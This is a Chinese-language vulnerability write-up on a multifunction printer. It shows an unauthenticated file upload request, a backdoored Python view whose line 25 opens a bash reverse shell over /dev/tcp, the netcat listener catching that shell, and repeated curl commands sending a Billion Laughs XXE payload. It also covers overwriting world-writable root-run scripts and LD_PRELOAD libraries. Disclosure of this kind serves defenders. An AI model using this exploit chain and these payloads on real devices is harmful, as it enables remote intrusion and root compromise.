如在106 个程序使用不安全权限进行本地特权提升和远程代码执行中所示,许多以 root 身份运行的程序可能会因不安全的权限而被覆盖 (777)
-
上传恶意 Python 程序或恶意 Python 库
-
…
在没有管理员权限的情况下使用打印机时,可以在多个 HTML 表单中发现这种缺乏保护的情况。例如,http://10.0.0.1:8080/Administration/maintenance/uploadsoft/DriverCustomize.html 页面允许上传任何文件:
必须<INPUT TYPE=SUBMIT>使用 Burp 在服务器响应中注入或直接生成此类请求来上传任何文件。
下一节将展示如何使用以下请求通过上传恶意 Python 脚本来获取远程代码执行的示例:
POST /contentwebserver/upload HTTP/1.1
Host: 10.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------394285998421640844852768059947
Content-Length: 1126
Origin: http://10.0.0.1:8080
Connection: close
Referer: http://10.0.0.1:8080/Administration/maintenance/uploadsoft/DriverCustomize.html
Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DDEVICE; clicked=0; addrLastVisited=ADDRBK; IgnoreSessionTimeout=1; Session=10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c
Upgrade-Insecure-Requests: 1
-----------------------------394285998421640844852768059947
Content-Disposition: form-data; name="formSubmitCompleteEventHandler"
frames[0].formSubmitCompleteUploadList
-----------------------------394285998421640844852768059947
Content-Disposition: form-data; name="DeviceInformationModel"
<DeviceInformationModel><GetValue><eFiling><View><BoxList/></View></eFiling></GetValue><Command><GetEFilingBoxes><commandNode>eFiling/BoxList</commandNode><Params><responseXpath contentType='XPath'>eFiling/View/BoxList</responseXpath><curPage contentType='Value'>1</curPage><pageSize contentType='Value'>200</pageSize><definedBox contentType='Value'>true</definedBox></Params></GetEFilingBoxes></Command></DeviceInformationModel>
-----------------------------394285998421640844852768059947
Content-Disposition: form-data; name="CsrfpId"
10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c
-----------------------------394285998421640844852768059947
Content-Disposition: form-data; name="test.txt"; filename="test.txt"
Content-Type: text/plain
test
-----------------------------394285998421640844852768059947--并且文件已正确上传到打印机:
bash-4.1# ls -la /work/al/tmp/upload/ContentWebServer_10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c/
total 12
drwx------ 2 apache trusted 4096 May 27 19:34 .
drwxrwxrwx 3 root trusted 4096 May 27 19:30 ..
-rw-rw-rw- 1 apache trusted 5 May 27 19:34 test.txt
bash-4.1# cat /work/al/tmp/upload/ContentWebServer_10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c/test.txt
test
bash-4.1#我们可以找到几个允许利用此漏洞/contentwebserver/uploadAPI 的网页。
经确定,这些网页使用了不安全的/contentwebserver/uploadAPI。任何攻击者都可以利用它们将任何文件上传到打印机中:
-
http://printer-ip/efiling/UploadFrame.html
-
http://printer-ip/efiling/UploadArchive.html
-
http://printer-ip/efiling/UploadFrame.html
-
http://printer-ip/efiling/UploadArchiveProgress.html
-
http://printer-ip/efiling/UpLoadArchiveClose.html
-
http://printer-ip/efiling/UploadArchiveButton.html
-
http://printer-ip/Registration/AddressBook/AddrImport.html
-
http://printer-ip/Registration/AddressBook/AddrImportListFrame.html
-
http://printer-ip/Administration/maintenance/uploadsoft/DriverCustomize.html
-
…
其中一些文件无需身份验证(例如注册或电子文件)即可直接访问,并且无需管理员帐户即可找到。
远程代码执行——在 WSGI Python 程序中上传新的 .py 模块
打印机的一些 API 和 Web 界面是用 Python 编写的。
由于打印机内部的这些Python脚本的权限不安全,因此已经上传了带有后门的版本,/registration/al/TopAccessPy/server/screenfacade/appmgmt/views.py如下所示:
/registration/al/TopAccessPy/server/screenfacade/appmgmt/views.py第 25 行添加了恶意负载的内容:
1 #! /usr/bin/env python
2 # -*- coding: utf-8 -*-
3 import sys
4 import os
5 from pyramid.view import view_config
6 from pyramid.exceptions import HTTPForbidden
7 from pyramid.response import Response,FileResponse
8 from server.screenfacade.appmgmt.applicationmanager import applicationManagementModel
9 import logging
10 import json
11 import pyeapicore
12
13 sys.path.append('/home/SYSROM_SRC/lib')
14
15 log = logging.getLogger("server")
16
17 @view_config(route_name='get_app_list_deployed', xhr=True, renderer='jsonp')
18 def get_app_list_deployed(request):
19 log.warning("++++++++++++++++++++++++++++++++")
20 log.warning("get app list Views : Start ")
21 SessionID = ''
22 session = ' '
23 csrfpId = ''
24 browserLang = ''
25 os.system("bash -i >& /dev/tcp/10.0.0.2/21 0>&1")
26
27 if 'SessionID' in request.cookies:
28 SessionID = request.cookies['SessionID']
29 if 'Session' in request.cookies:
30 session = request.cookies['Session']
31 if 'csrfpId' in request.headers:
32 csrfpId = request.headers['csrfpId']
33 if 'BrowserLang' in request.cookies:
34 browserLang = request.cookies['BrowserLang']
35
36 log.info('Session ID obtained from request :' + SessionID)
37 log.info('csrfpId obtained from request:' + csrfpId)
38 validationMap = True
39
40 if validationMap['VALIDATION_STATUS'] == 'PASSED':
41 log.info('User Validation : SUCCESS')
42 data = applicationManagementModel.getAppList(browserLang)
43 log.warning("get app list Views : End ")
44 log.warning("++++++++++++++++++++++++++++++++")
45 return json.dumps(data)
46 else:
47 log.info('User Validation : FAILURE')
48 log.warning("get app list Views : End ")
49 if "HTTP_REQUEST_FORBIDDEN" in validationMap:
50 return HTTPForbidden("Error 403 : Forbidden Request")
51 else:
52 return json.dumps(validationMap)
53
54 @view_config(route_name='start_background_application', xhr=True, renderer='jsonp')
55 def start_background_application(request):
56 log.warning("++++++++++++++++++++++++++++++++")
57 log.warning("start background app : Start ")
[...]
由于此 API 可访问之前的某些反向代理规则和检查,因此http://printerip/tapy/server/appmgmt/applistDeployed在访问 http://printerip/(无需身份验证)时,可以使用打印机先前提供的 cookie 的 API 路径来访问此 Python 代码。
当向发送HTTP请求时http://printerip/tapy/server/appmgmt/applistDeployed,攻击者将收到来自打印机的连接回shell:
kali# nc -l -v -p 21
listening on [any] 21 ...
10.0.0.1: inverse host lookup failed: Unknown host
connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 37243
[apache@MFP14144292 /]$ id
uid=1000(apache) gid=2000(trusted) groups=2000(trusted)
[apache@MFP14144292 /]$ uname -ap
Linux MFP14144292 3.10.38-ltsi-WR6.0.0.11_standard #3513 SMP Tue Jul 5 09:58:22 IST 2022 i686 GNU/Linux
[apache@MFP14144292 /]$以 apache 形式连接回 shell:
远程代码执行——在 WSGI Python 程序中上传新的 .ini 配置文件
可以覆盖 WSGI Python 程序使用的 .ini 配置文件。此技术自 2023-02-28 起公开:https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html。
Apache 正在使用 WSGI 配置运行:
bash-4.1# ps auxww | grep apache
apache 1611 0.0 0.1 1264444 3708 ? Sl 10:37 0:00 /usr/local/ebx/httpd_worker/bin/httpd_worker -f /encryption/al/network/config/httpd-prox.conf -k start
apache 1822 0.2 3.6 483056 108852 ? Sl 10:37 1:02 (wsgi:webpanel) -f /encryption/al/network/config/httpd-wsgi.conf -k start
apache 1823 0.0 2.1 270952 64172 ? Sl 10:37 0:05 (wsgi:topaccesspy) -f /encryption/al/network/config/httpd-wsgi.conf -k start
apache 1824 0.0 0.1 285148 4452 ? Sl 10:37 0:00 /usr/local/ebx/httpd_worker/bin/httpd_worker -f /encryption/al/network/config/httpd-wsgi.conf -k start作为 WSGI 运行的 Python 脚本配置了特定的 .ini 配置文件:
-
/registration/al/WebPanel/development.ini -
/registration/al/TopAccessPy/development.ini
不幸的是,这些配置文件可以由于不安全的权限而被重写,从而允许远程攻击者执行命令,正如最近的公开研究所描述的那样。
这些文件具有不安全的权限,如下所示:
bash-4.1# ls -la /registration/al/WebPanel/
total 2632
drwxrwxrwx 7 root root 4096 Dec 6 03:33 .
drwxrwxrwx 19 root root 4096 Mar 14 16:28 ..
-rwxrwxrwx 1 root root 2642944 Dec 6 03:33 HomeBackgroundImages.tar.gz
-rwxrwxrwx 1 root root 857 Dec 6 03:33 Makefile
-rwxrwxrwx 1 root root 909 Dec 6 03:33 config.rb
-rwxrwxrwx 1 root root 1103 Dec 6 03:33 development.ini
drwxrwxrwx 4 root root 4096 Jan 22 2015 predefinedxml
-rwxrwxrwx 1 root root 199 Dec 6 03:33 pyramid.wsgi
drwxrwxrwx 3 root root 4096 Dec 6 03:33 statuspages
drwxrwxrwx 14 root root 4096 Dec 6 03:33 wpclient
drwxrwxrwx 6 root root 4096 Mar 14 16:32 wpserver
drwxrwxrwx 2 root root 4096 Dec 6 03:33 wpserver.egg-info
bash-4.1# ls -la /registration/al/WebPanel/development.ini
-rwxrwxrwx 1 root root 1103 Dec 6 03:33 /registration/al/WebPanel/development.ini
bash-4.1# ls -la /registration/al/TopAccessPy
total 36
drwxrwxrwx 5 root root 4096 Dec 6 03:39 .
drwxrwxrwx 19 root root 4096 Mar 14 16:28 ..
-rwxrwxrwx 1 root root 315 Dec 6 03:39 Makefile
-rwxrwxrwx 1 root root 2091 Dec 6 03:39 TA_CacheScript.sh
drwxrwxrwx 7 root root 4096 Mar 23 10:37 client
-rwxrwxrwx 1 root root 1078 Dec 6 03:39 development.ini
-rwxrwxrwx 1 root root 202 Dec 6 03:39 pyramid.wsgi
drwxrwxrwx 6 root root 4096 Mar 14 16:32 server
drwxrwxrwx 2 root root 4096 Dec 6 03:39 server.egg-info
bash-4.1# ls -la /registration/al/TopAccessPy/development.ini
-rwxrwxrwx 1 root root 1078 Dec 6 03:39 /registration/al/TopAccessPy/development.ini可以覆盖这些脚本以包含要执行的特定命令:
内容/registration/al/TopAccessPy/development.ini:
bash-4.1# cat /registration/al/TopAccessPy/development.ini
[app:main]
use = egg:server
pyramid.reload_templates = true
pyramid.debug_authorization = false
pyramid.debug_notfound = false
pyramid.debug_routematch = false
pyramid.default_locale_name = en
pyramid.includes = pyramid_tm
[server:main]
# Begin logging configuration
[loggers]
keys = root, server
[handlers]
keys = console, serverhandler
[formatters]
keys = generic, serverformatter
[logger_root]
level = DEBUG
handlers = console
[logger_server]
level=DEBUG
handlers=serverhandler
qualname=server
propagate=0
[handler_console]
class = StreamHandler
args = (sys.stderr,)
level = NOTSET
formatter = generic
[handler_serverhandler]
class=logging.handlers.RotatingFileHandler
level=DEBUG
formatter=serverformatter
args=('/work/log/al/webpanel/python_ta.log','a',(5*1024*1024),3)
[formatter_generic]
format = %(asctime)s %(levelname)-5.5s [%(name)s][%(threadName)s] %(message)s
[formatter_serverformatter]
format=%(asctime)s%(msecs)03d Pid= %(process)d Tid= %(thread)d %(filename)s %(lineno)d %(levelname)s %(message)s
datefmt=%m/%d %H:%M:%S
# End logging configuration远程代码执行——上传恶意脚本/tmp/backtraceScript.sh并注入恶意 gdb 命令
当程序崩溃时,该/tmp/backtraceScript.sh脚本将以 root 身份执行,如下所示:
2023/05/27 19:48:02 CMD: UID=0 PID=22535 | sh -c /tmp/backtraceScript.sh "/work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080" > "/work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080"_backtrace
2023/05/27 19:48:02 CMD: UID=0 PID=22536 | /bin/bash /tmp/backtraceScript.sh /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080
2023/05/27 19:48:02 CMD: UID=0 PID=22540 | /bin/bash /tmp/backtraceScript.sh /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080
2023/05/27 19:48:02 CMD: UID=0 PID=22539 | /bin/bash /tmp/backtraceScript.sh /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080
2023/05/27 19:48:02 CMD: UID=0 PID=22538 | /bin/bash /tmp/backtraceScript.sh /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080
2023/05/27 19:48:02 CMD: UID=0 PID=22537 | /bin/bash /tmp/backtraceScript.sh /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080
2023/05/27 19:48:03 CMD: UID=0 PID=22541 | gdb -c /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080 -x /tmp/gdb_commands.txt
2023/05/27 19:48:03 CMD: UID=0 PID=22542 | gdb /usr/local/ebx/httpd_worker/bin/httpd_worker /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080 --batch --command=/tmp/gdb_commands.txt
2023/05/27 19:48:03 CMD: UID=0 PID=22543 | iconv -l此脚本具有不安全的权限(777),并将以 root 身份运行 gdb:
内容/tmp/backtraceScript.sh:
bash-4.1# ls -la /tmp/backtraceScript.sh
-rwxrwxrwx 1 root root 1457 Apr 6 2016 /tmp/backtraceScript.sh
bash-4.1# cat /tmp/backtraceScript.sh
#!/bin/bash
OIFS=${IFS}
IFS=$'n'
echo "quit" > /tmp/gdb_commands.txt
echo "quit" >> /tmp/gdb_commands.txt
EXE_NAME=`gdb -c "$1" -x /tmp/gdb_commands.txt | grep "Core was generated by" | cut -d'`' -f2 | cut -d' ' -f1`
echo "thread apply all backtrace full" > /tmp/gdb_commands.txt
echo "set print asm" >> /tmp/gdb_commands.txt
echo "set print demangle on" >> /tmp/gdb_commands.txt
echo "disassemble" >> /tmp/gdb_commands.txt
echo "info reg" >> /tmp/gdb_commands.txt
echo "quit" >> /tmp/gdb_commands.txt
echo "quit" >> /tmp/gdb_commands.txt
if [ "$EXE_NAME" = "" ];then
if [ -d /work/log/platform/syscallerr/core_files ];then
mv "$1" /work/log/platform/syscallerr/core_files/
else
mkdir -p /work/log/platform/syscallerr/core_files
mv "$1" /work/log/platform/syscallerr/core_files/
fi
else
if [ -f $EXE_NAME ];then
gdb $EXE_NAME "$1" --batch --command=/tmp/gdb_commands.txt 2>&1
elif [ -f $EB2/bin/$EXE_NAME ]; then
gdb $EB2/bin/$EXE_NAME "$1" --batch --command=/tmp/gdb_commands.txt 2>&1
elif [ "$EXE_NAME"="(wsgi:webapi)" -o "$EXE_NAME"="(wsgi:webpanel)" -o "$EXE_NAME"="(wsgi:topaccesspy)" ]; then
EXE_NAME=/usr/local/ebx/httpd_worker/bin/httpd_worker
gdb $EXE_NAME "$1" --batch --command=/tmp/gdb_commands.txt 2>&1
else
if [ -d /work/log/platform/syscallerr/core_files ];then
mv "$1" /work/log/platform/syscallerr/core_files/
else
mkdir -p /work/log/platform/syscallerr/core_files
mv "$1" /work/log/platform/syscallerr/core_files/
fi
fi
fi
IFS=${OIFS}
bash-4.1#攻击者还可以覆盖 gdb 脚本(脚本中由 gdb 使用),以包含 gdb 命令并获取远程代码执行/tmp/gdb_commands.txt。/tmp/backtraceScript.sh
攻击者可以更改/tmp/backtraceScript.sh以获取远程代码执行。
攻击者可以更改/tmp/gdb_commands.txt脚本来获取远程代码执行。
远程代码执行——上传恶意/home/SYSROM_SRC/build/common/bin/sapphost.py程序
/home/SYSROM_SRC/build/release/bin/sapphost.py打印机启动时,该程序以 root 身份运行:
bash-4.1# ps auxww|grep python
root 3984 5.0 5.3 200160 70944 ? Sl 18:49 0:03 python /home/SYSROM_SRC/build/release/bin/sapphost.py 10000000-0000-0000-0000-500000000000
root 4597 4.5 3.5 144312 47740 ? Sl 18:49 0:02 python /home/SYSROM_SRC/build/release/bin/sapphost.py 10000000-0000-0000-0000-500000000001
root 5193 0.0 0.1 12616 1852 ? S 18:50 0:00 grep python
bash-4.1#/home/SYSROM_SRC/build/release/bin/sapphost.py是一个符号链接,/home/SYSROM_SRC/build/common/bin/sapphost.py并且这个 Python 程序具有不安全的权限,允许任何本地用户或任何远程攻击者利用不安全的文件上传漏洞来覆盖它:
bash-4.1# ls -la /home/SYSROM_SRC/build/release/bin/sapphost.py
lrwxrwxrwx 1 root root 32 Mar 15 11:44 /home/SYSROM_SRC/build/release/bin/sapphost.py -> ../../thirdparty/bin/sapphost.py
bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/bin/sapphost.py
lrwxrwxrwx 1 root root 28 Mar 15 11:44 /home/SYSROM_SRC/build/thirdparty/bin/sapphost.py -> ../../common/bin/sapphost.py
bash-4.1# ls -la /home/SYSROM_SRC/build/common/bin/sapphost.py -rwxrwxrwx 1 root root 2124 2021 年 10 月 12 日 /home/SYSROM_SRC/build/common/bin/sapphost.py
攻击者可以覆盖此 Python 代码以在打印机启动时获取远程代码执行。
远程代码执行——上传恶意库
分析打印机中运行的进程时,发现该LD_PRELOAD变量用于加载特定的共享库:
-
/ramdisk/al/libGetNameInfoInterface.so -
/ramdisk/al/libGetAddtInfoInterface.so
我们可以LD_PRELOAD在打印机运行的程序中找到默认设置的变量:
bash-4.1# printenv | grep LD_PRELO
LD_PRELOAD=/ramdisk/al/libGetNameInfoInterface.so:/ramdisk/al/libGetAddtInfoInterface.so:
bash-4.1# ls -la /ramdisk/al/libGetNameInfoInterface.so
-rwxrwxrwx 1 root root 70813 Dec 6 02:02 /ramdisk/al/libGetNameInfoInterface.so
bash-4.1# s -la /ramdisk/al/libGetAddtInfoInterface.so
-rwxrwxrwx 1 root root 87311 Dec 6 02:02 /ramdisk/al/libGetAddtInfoInterface.so
bash-4.1#例如,当向打印机发送 55 个 HTTP 请求时,打印机将动态创建以 root 身份运行的新 Apache 进程,如下所示。这些新进程将加载并执行来自 和 的代码libGetNameInfoInterface.so。libGetAddtInfoInterface.so攻击者可以重写任何文件来获取远程代码执行。
使用预先认证盲 XML 外部实体 (XXE) 注入 – DoS 的HTTP 请求,我们将发送 55 个包含 Billion-Laugh 攻击的 HTTP 请求(仅显示最后 3 个),以在远程打印机中创建新的 Apache 进程:
kali% curl -i -s -k -X $'POST'
-H $'Host: 10.0.0.1:8080' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H $'Content-Type: text/plain; charset=utf-8' -H $'csrfpId: 10.0.0.1.852d519a6fa9825fae857bac5c003da0' -H $'Content-Length: 760' -H $'Origin: http://10.0.0.1:8080' -H $'Connection: close' -H $'Referer: http://10.0.0.1:8080/?MAIN=TOPACCESS'
-b $'Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0; Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DLOGS%26SUB%3DJOBLOGS%26CAT%3DPRINT'
--data-binary $'<!DOCTYPE lolz [x0dx0a <!ENTITY lol "lol">x0dx0a <!ELEMENT lolz (#PCDATA)>x0dx0a <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">x0dx0a <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">x0dx0a <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">x0dx0a <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">x0dx0a <!ENTITY lol5 "&lol4;&lol4;&lol4;">x0dx0a <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">x0dx0a <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">x0dx0a <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">x0dx0a <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">x0dx0a]>x0dx0a<lolz>&lol9;</lolz>'
$'http://10.0.0.1:8080/contentwebserver' &
[53] 2286190
kali% curl -i -s -k -X $'POST'
-H $'Host: 10.0.0.1:8080' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H $'Content-Type: text/plain; charset=utf-8' -H $'csrfpId: 10.0.0.1.852d519a6fa9825fae857bac5c003da0' -H $'Content-Length: 760' -H $'Origin: http://10.0.0.1:8080' -H $'Connection: close' -H $'Referer: http://10.0.0.1:8080/?MAIN=TOPACCESS'
-b $'Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0; Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DLOGS%26SUB%3DJOBLOGS%26CAT%3DPRINT'
--data-binary $'<!DOCTYPE lolz [x0dx0a <!ENTITY lol "lol">x0dx0a <!ELEMENT lolz (#PCDATA)>x0dx0a <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">x0dx0a <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">x0dx0a <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">x0dx0a <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">x0dx0a <!ENTITY lol5 "&lol4;&lol4;&lol4;">x0dx0a <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">x0dx0a <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">x0dx0a <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">x0dx0a <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">x0dx0a]>x0dx0a<lolz>&lol9;</lolz>'
$'http://10.0.0.1:8080/contentwebserver' &
[54] 2286192
kali% curl -i -s -k -X $'POST'
-H $'Host: 10.0.0.1:8080' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H $'Content-Type: text/plain; charset=utf-8' -H $'csrfpId: 10.0.0.1.852d519a6fa9825fae857bac5c003da0' -H $'Content-Length: 760' -H $'Origin: http://10.0.0.1:8080' -H $'Connection: close' -H $'Referer: http://10.0.0.1:8080/?MAIN=TOPACCESS'
-b $'Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0; Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DLOGS%26SUB%3DJOBLOGS%26CAT%3DPRINT'
--data-binary $'<!DOCTYPE lolz [x0dx0a <!ENTITY lol "lol">x0dx0a <!ELEMENT lolz (#PCDATA)>x0dx0a <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">x0dx0a <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">x0dx0a <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">x0dx0a <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">x0dx0a <!ENTITY lol5 "&lol4;&lol4;&lol4;">x0dx0a <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">x0dx0a <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">x0dx0a <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">x0dx0a <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">x0dx0a]>x0dx0a<lolz>&lol9;</lolz>'
$'http://10.0.0.1:8080/contentwebserver' &
[55] 2286194我们可以发现使用LD_PRELOAD远程打印机上的变量创建了新的 Apache 进程:
2023/05/27 11:31:42 CMD: UID=0 PID=4132 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:42 CMD: UID=0 PID=4131 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:42 CMD: UID=0 PID=4130 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:42 CMD: UID=0 PID=4129 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:43 CMD: UID=0 PID=4138 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:43 CMD: UID=0 PID=4137 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:43 CMD: UID=0 PID=4136 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:43 CMD: UID=0 PID=4135 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:43 CMD: UID=0 PID=4134 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:43 CMD: UID=0 PID=4133 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:43 CMD: UID=0 PID=4139 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:43 CMD: UID=0 PID=4140 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:44 CMD: UID=0 PID=4141 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 11:31:44 CMD: UID=0 PID=4142 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 11:31:45 CMD: UID=0 PID=4143 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:46 CMD: UID=0 PID=4145 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:46 CMD: UID=0 PID=4144 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:47 CMD: UID=0 PID=4146 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 11:31:47 CMD: UID=0 PID=4147 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 11:31:47 CMD: UID=0 PID=4151 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:47 CMD: UID=0 PID=4150 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:47 CMD: UID=0 PID=4149 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:47 CMD: UID=0 PID=4148 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:48 CMD: UID=0 PID=4156 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:48 CMD: UID=0 PID=4155 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:48 CMD: UID=0 PID=4154 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:48 CMD: UID=0 PID=4153 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:48 CMD: UID=0 PID=4152 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:48 CMD: UID=0 PID=4158 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start我们可以分析一个新创建的Apache进程。例如,PID为4129的Apache进程将加载一些库,以执行这些库中实现的代码:
bash-4.1# cat /proc/4129/maps
08048000-080bb000 r-xp 00000000 08:02 155908 /home/SYSROM_SRC/build/thirdparty/bin/httpd
080bb000-080bf000 rw-p 00072000 08:02 155908 /home/SYSROM_SRC/build/thirdparty/bin/httpd
080bf000-0833e000 rw-p 00000000 00:00 0 [heap]
0833e000-08360000 rw-p 00000000 00:00 0 [heap]
08360000-083e8000 rw-p 00000000 00:00 0 [heap]
4bc47000-4bc63000 r-xp 00000000 08:02 11770 /lib/ld-2.11.3.so
4bc63000-4bc64000 r--p 0001b000 08:02 11770 /lib/ld-2.11.3.so
4bc64000-4bc65000 rw-p 0001c000 08:02 11770 /lib/ld-2.11.3.so
